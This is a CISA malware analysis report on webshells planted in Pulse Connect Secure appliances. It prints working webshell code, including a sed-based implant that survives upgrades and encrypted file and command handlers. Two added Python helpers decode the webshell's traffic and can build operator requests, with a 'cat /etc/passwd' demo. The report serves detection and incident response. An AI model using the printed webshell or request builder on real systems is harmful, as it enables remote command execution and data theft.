Malware Analysis Report (AR21-202M)

MAR-10338868-1.v1: Pulse Connect Secure


Summary

Malware Analysis Report
10338868.r1.v1
2021-07-14

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

Three files were submitted to CISA for analysis. One file is a modified copy of a Pulse Secure Perl module (DSUpgrade.pm) that uses embedded shell commands to patch a Pulse Secure Perl Common Gateway Interface (CGI) script so that it becomes a webshell. The other two files are Pulse Secure CGI scripts that have already been patched in this way; they allow a remote operator to read and write files on the target system and to execute operating system commands on it. This analysis is derived from malicious files found on Pulse Connect Secure devices.


For a downloadable copy of IOCs, see: MAR-10338868-1.v1.WHITE.stix.

Submitted Files (3)

44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4 (licenseserverproto.cgi)

85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226 (healthcheck.cgi)

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85 (DSUpgrade.pm)

Findings

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85

Tags

trojan webshell

Details
Name DSUpgrade.pm
Size 5270 bytes
Type Perl5 module source, ASCII text, with very long lines
MD5 d855ebd2adeaf2b3c87b28e77e9ce4d4
SHA1 1e43bc7cde1c2ac7b0db7b74b3be47334171d410
SHA256 a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
SHA512 d94795f11c04862b054d2f83babca034c20bfd00c2c0abe1e1fcfdb3854924a0d9944d0f168147060311d948b1bb194f27eaa491563e7b00ba58e776a4a6f676
ssdeep 96:FYIFAu1JZtGm4OcAHgDfX27AF1K2dsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbvek:eIB1XcTfX20Dds+gF3Ar8yXp6uIyUMQB
Entropy 5.031760
Antivirus
ClamAV Unix.Trojan.ATRIUM-9855919-0
YARA Rules

No matches found.

ssdeep Matches
99 359b86d7f20430f0418b8401be34251bcddcc8aa48803597d8d78caaa547c875
91 463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9
99 c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69
Description

The file contains malicious code that was patched into the Pulse Secure application.

--Begin Malicious Code--
# Path of the legitimate CGI script that will be turned into a webshell.
my $cgi_p="/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi";
# Shell command that patches the installer script /pkg/do-install (shown again below).
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");                               # make the root filesystem writable
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");   # unpack the installer from the upgrade package
system("cp -f /tmp/installer/do-install /pkg/");                               # stage the legitimate installer files in /pkg ...
system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
system("$cmd_x");                                                              # ... then patch do-install in place
system("rm -rf /tmp/installer");
my $td = time - $ts;                      # $ts, $html and $console are defined by the surrounding upgrade routine (not shown)
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}


return $status == 0;
}
--End Malicious Code--

The patched-in code uses the following SED command to insert a line into the Pulse Secure installer script "/pkg/do-install", immediately before the line containing echo_console "Saving package". The inserted line runs while an upgrade package is being installed: an inner SED command replaces the main(); call in the copy of licenseserverproto.cgi inside the new root image (/tmp/data/root) with a webshell, and the trojanised DSUpgrade.pm and dspkginstall are copied into that image as well.

--Begin Malicious SED Command--
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install"
--End Malicious SED Command--

The inserted webshell checks each request to licenseserverproto.cgi (the path held in '$cgi_p') for a parameter named "id". If the parameter is present, the script prints minimal HTTP headers and passes the parameter value unmodified to Perl's system() function, which executes it as an operating system command; otherwise it calls the original main() so the script behaves normally. Because the patch is applied to the new root image and the modified DSUpgrade.pm is copied into it, both the webshell and the patching code are carried across the upgrade.
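The nested quoting in $cmd_x makes it hard to see what actually lands in do-install and in the CGI file. The following added example (not code from the report, from CISA or from Pulse Secure) emulates the two SED edits in Python, applies them to constructed stand-in files, and runs a small indicator check of the kind a responder could use on files pulled from a device. The unescaped WEBSHELL_BRANCH and INNER_COMMAND strings are this example's reconstruction of the command after the Perl, shell and SED quoting layers are unwound; the sample do-install and CGI contents are filler around the two lines the SED patterns anchor on, and the indicator names are this example's own.

```python
import re

# Path of the CGI that the inner sed turns into a webshell (from the report).
CGI_PATH = "/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi"

# The Perl line the inner sed writes in place of the "main();" line, with the
# Perl, sed and shell quoting layers of $cmd_x unwound (reconstruction, assumed).
WEBSHELL_BRANCH = (
    'if(CGI::param("id")){print "Cache-Control: no-cache\\n";'
    'print "Content-type: text/html\\n\\n";'
    'my $na=CGI::param("id");system("$na");}else{&main();}'
)

# The shell line the outer sed inserts into /pkg/do-install: a subshell that
# patches the CGI inside the new root image (/tmp/data/root) and copies the
# trojanised DSUpgrade.pm and dspkginstall into that image.
INNER_COMMAND = (
    "(sed -i '/main();$/c" + WEBSHELL_BRANCH + "' /tmp/data/root" + CGI_PATH + ";"
    "cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;"
    "cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)"
)


def sed_insert_before(text, pattern, new_line):
    """Emulate `sed -i '/pattern/i new_line'`: insert new_line before each matching line."""
    out = []
    for line in text.splitlines():
        if re.search(pattern, line):
            out.append(new_line)
        out.append(line)
    return "\n".join(out) + "\n"


def sed_change_line(text, pattern, new_line):
    """Emulate `sed -i '/pattern/c new_line'`: replace each matching line with new_line."""
    return "\n".join(new_line if re.search(pattern, line) else line
                     for line in text.splitlines()) + "\n"


def patch_do_install(do_install_text):
    """Outer sed from $cmd_x: hook the line before echo_console "Saving package"."""
    return sed_insert_before(do_install_text, r'echo_console "Saving package"', INNER_COMMAND)


def patch_cgi(cgi_text):
    """Inner sed: replace the CGI's top-level main(); call with the webshell branch."""
    return sed_change_line(cgi_text, r"main\(\);$", WEBSHELL_BRANCH)


# Indicators a responder can grep for in files pulled from a device. Each is
# matched per line, which is how the patched code is laid out.
INDICATORS = {
    # a request parameter and a system() call on the same line
    "cgi_param_to_system": re.compile(r"""CGI::param\(["']\w+["']\).*system\("""),
    # the specific branch this implant installs
    "main_call_replaced": re.compile(r'if\s*\(\s*CGI::param\("id"\)\s*\)'),
    # do-install carrying a nested sed that also copies DSUpgrade.pm
    "do_install_nested_sed": re.compile(r"\(sed -i '/main\(\);\$/c.*DSUpgrade\.pm"),
}


def find_indicators(text):
    """Return the names of the indicators present in text (empty list when clean)."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


# Constructed stand-ins: only the two lines the sed patterns anchor on are taken
# from the report; the rest of both files is filler.
SAMPLE_DO_INSTALL = '#!/bin/sh\n# installer filler\necho_console "Saving package"\n'
SAMPLE_CGI = "#!/home/bin/perl\nuse CGI;\nsub main { print \"ok\\n\"; }\nmain();\n"


def demo():
    """Apply both patches to the samples and return the indicator hits for each result."""
    patched_installer = patch_do_install(SAMPLE_DO_INSTALL)
    patched_cgi = patch_cgi(SAMPLE_CGI)
    return {
        "clean_cgi": find_indicators(SAMPLE_CGI),
        "patched_cgi": find_indicators(patched_cgi),
        "patched_installer": find_indicators(patched_installer),
    }


if __name__ == "__main__":
    print(patch_cgi(SAMPLE_CGI))
    print(demo())
```

Running demo() shows the patched CGI matching both per-line indicators and the patched installer matching all three, since the inserted do-install line carries the whole webshell branch inside it; the clean sample matches none. On a real device the same check belongs on every CGI under the web root and on /pkg/do-install, not just on the two files named in this report.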

85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226

Tags

webshell

Details
Name healthcheck.cgi
Size 9272 bytes
Type Perl script text executable
MD5 6a5ba3223f1eac63f9bb29262f73e90d
SHA1 870f0e58f0a0ff695aab39a93ad26b16698887a7
SHA256 85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226
SHA512 856bab44cf27c750a5bc378252eb15548e8590e906bc4ab2cb14e5a28e19e75ca356e976e8a0e66f8e9d69e5b11e8007487d167d91edc79dc05ea32308309f3f
ssdeep 192:rzwJNuIYj7rcCOk1QrhMeWyOUV9AWojcZiOQiQsfinnoK9Cih1pa+7yieyhm:rzwJwrXWOUV9AWojoiOuayQ
Entropy 5.118183
Antivirus
Symantec Hacktool.Webshell
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script into which malicious code has been patched, turning it into a webshell. The following listing reproduces the malicious code with comments that describe the capabilities of each routine:

--Begin Malicious Code--
use MIME::Base64;
use Crypt::RC4;
my $ph="<REDACTED>";   # hard-coded secret appended to every per-message RC4 key (redacted in this report)

# r: generate n random bytes (used as the per-message key prefix)
sub r
{
    my $n=$_[0];
    my $rs;
    for (my $i=0;$i<$n;$i++)
    {
        my $n1=int(rand(256));
        $rs.=chr($n1);
    }
    return $rs;
}

# a: encrypt output for the operator. key = 6 random bytes . $ph; output = Base64(prefix . RC4 ciphertext)
sub a
{
    my $st=$_[0];
    my $k=r(6);
    my $en = RC4( $k.$ph, $st);
    return encode_base64($k.$en);
}

# b: decrypt operator input. Base64-decode, split off the 6-byte prefix, rebuild the key, RC4-decrypt
sub b
{
    my $s= decode_base64($_[0]);
    my $l=length($s);
    my $k= substr($s,0,6);
    my $en=substr($s,6,$l-6);
    my $de = RC4( $k.$ph, $en );
    return $de;
}

# c: download a file from the target system. 'img' holds the encrypted path
sub c
{
    my $fi=CGI::param('img');
    my $FN=b($fi);
    my $fd;
    print "Content-type: application/x-download\n";
    open(*FILE, "<$FN" );
    while(<FILE>)
    {
        $fd=$fd.$_;
    }
    close(*FILE);
    print "Content-Disposition: attachment; filename=tmp\n\n";
    print a($fd);                  # file content is RC4-encrypted and Base64-encoded before it is sent to the operator
}

# d: write a file to the target system. 'cert' holds the encrypted content, 'md5' the encrypted destination path
sub d
{
    print "Cache-Control: no-cache\n";
    print "Content-type: text/html\n\n";
    my $fi = CGI::param('cert');
    $fi=b($fi);                    # decrypted content to be written
    my $pa=CGI::param('md5');
    $pa=b($pa);                    # decrypted path of the output file
    open (*outfile, ">$pa");
    print outfile $fi;             # content is written to the output file
    close (*outfile);
}

# e: execute a system command. 'name' holds the encrypted command
sub e
{
    print "Cache-Control: no-cache\n";
    print "Content-type: image/gif\n\n";    # response is labelled as a GIF image
    my $na=CGI::param('name');
    $na=b($na);                    # incoming command is Base64-decoded and RC4-decrypted
    my $rt;
    if (!$na or $na eq "cd")
    {
        $rt="Error 404";
    }
    else
    {
        my $ot="/tmp/1";
        system("$na >/tmp/1 2>&1");   # execute the decrypted command, capturing stdout and stderr in /tmp/1
        open(*cmd_result,"<$ot");
        while(<cmd_result>)
        {
            $rt=$rt.$_;
        }
        close(*cmd_result);
        unlink $ot;                   # remove the temporary output file
    }
    print a($rt);                     # encrypted command output is returned to the operator
}

# f: dispatch on which parameters are present in the POST request
sub f
{
    if(CGI::param('cert'))
    {
        d();                          # write file
    }
    elsif(CGI::param('img') and CGI::param('name'))
    {
        c();                          # download file
    }
    elsif(CGI::param('name') and CGI::param('img') eq "")
    {
        e();                          # decrypt and execute system command
    }
    else
    {
        &main();                      # fall through to the legitimate CGI
    }
}

# Only POST requests reach the webshell; every other request runs the original script unchanged
if ($ENV{'REQUEST_METHOD'} eq "POST")
{
    f();
}
else
{
    &main();
}
--End Malicious Code--

The webshell allows a remote operator to read and write files on the target system and to execute operating system commands on it. All data passed to and from the webshell is RC4-encrypted and Base64-encoded. The RC4 key for each message is a random six-byte prefix, transmitted in the clear at the start of the Base64 blob, concatenated with the hard-coded secret $ph; the prefix only varies the ciphertext between messages, so anyone who recovers $ph from the patched file can decrypt captured traffic in both directions.
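The following added example (not code from the report and not the webshell itself) re-implements sub a and sub b in Python and mirrors the dispatch in sub f, so that captured POST bodies and responses for healthcheck.cgi or licenseserverproto.cgi can be decrypted and labelled once $ph has been recovered from the patched file. The secret, the fixed six-byte prefix, the request values and the helper build_post_body (a reconstruction of what an operator client must send, derived from sub b) are this example's assumptions; the handler labels are its own naming.

```python
import base64
import os
from urllib.parse import parse_qs, urlencode


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key schedule + keystream XOR), the algorithm Crypt::RC4 implements."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def shell_encode(secret: bytes, plaintext: bytes, prefix=None) -> str:
    """sub a: key = 6 random bytes . $ph; output = Base64(prefix || RC4 ciphertext).
    The prefix travels in the clear, so it adds no secrecy, only per-message variation."""
    k = os.urandom(6) if prefix is None else prefix
    if len(k) != 6:
        raise ValueError("prefix must be exactly 6 bytes, as produced by r(6)")
    return base64.b64encode(k + rc4(k + secret, plaintext)).decode()


def shell_decode(secret: bytes, blob: str) -> bytes:
    """sub b: Base64-decode, split off the 6-byte prefix, rebuild the key, RC4-decrypt.
    b64decode skips the line breaks Perl's encode_base64 inserts every 76 characters."""
    raw = base64.b64decode(blob)
    return rc4(raw[:6] + secret, raw[6:])


def build_post_body(secret: bytes, prefix: bytes, **params: bytes) -> str:
    """What an operator client has to send: every parameter value passes through sub a.
    (Reconstructed from sub b; the real client is not on the page.)"""
    return urlencode({name: shell_encode(secret, value, prefix) for name, value in params.items()})


def classify_request(method: str, body: str, secret: bytes) -> dict:
    """Mirror the dispatch in sub f and decrypt the inputs of the handler it selects."""
    if method != "POST":
        return {"handler": "main"}              # non-POST never reaches the webshell
    p = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if p.get("cert"):                           # sub d: write file
        return {"handler": "d (write file)",
                "path": shell_decode(secret, p.get("md5", "")),
                "content": shell_decode(secret, p["cert"])}
    if p.get("img") and p.get("name"):          # sub c: download file
        return {"handler": "c (download file)", "path": shell_decode(secret, p["img"])}
    if p.get("name") and p.get("img", "") == "":  # sub e: execute command
        cmd = shell_decode(secret, p["name"])
        # sub e answers "Error 404" for a Perl-false command ("" or "0") or a bare "cd"
        return {"handler": "e (execute)", "command": cmd,
                "rejected": cmd in (b"", b"0", b"cd")}
    return {"handler": "main"}                  # falls through to the legitimate CGI


def decode_response(secret: bytes, response_body: str) -> bytes:
    """Command output and downloaded files come back through sub a; decode them the same way."""
    return shell_decode(secret, response_body)


if __name__ == "__main__":
    # Constructed demonstration values: the real $ph is redacted in the report.
    secret = b"constructed-secret"
    body = build_post_body(secret, b"ABCDEF", name=b"cat /etc/passwd")
    print(body)
    print(classify_request("POST", body, secret))
```

To use this against real captures, set secret to the $ph string taken from the device's patched CGI file and feed each POST body to classify_request and each response body to decode_response. Two traffic characteristics follow from the code and are worth alerting on independently of the key: a POST to these CGI paths carrying cert, img or name parameters whose values are Base64 blobs, and a response declared as image/gif (sub e) or application/x-download with the fixed filename tmp (sub c) whose body is Base64 text rather than binary.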

44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4

Tags

webshell

Details
Name licenseserverproto.cgi
Size 3372 bytes
Type Perl script text executable
MD5 e3903c8e9715080795b3fc045d8f8db7
SHA1 be63eac2efc4a2bdc17dcd067975ccd0113cf70a
SHA256 44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4
SHA512 5bd97a7184ff6707ad0801b544d58ad72884a0f51aba3802ebb0cff1c6bcb30b3e3392291fedc90c676cc2808b9a0b879d5f3dca7311474f34fd3fd0272ae5cb
ssdeep 48:EbLYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejB4:EvYkJAZfv/wO27Yv/kh91TQik
Entropy 5.397215
Antivirus
Symantec Hacktool.Webshell
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script with malicious code patched in. This file and "healthcheck.cgi" (85f74424fb4c7dba9f2e9c60a95c8a226a97f7dfc277f5ce6f34862a9f500226) have the same malicious code patched in. This file contains a different hard-coded RC4 key for encryption.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

July 21, 2021: Initial Version
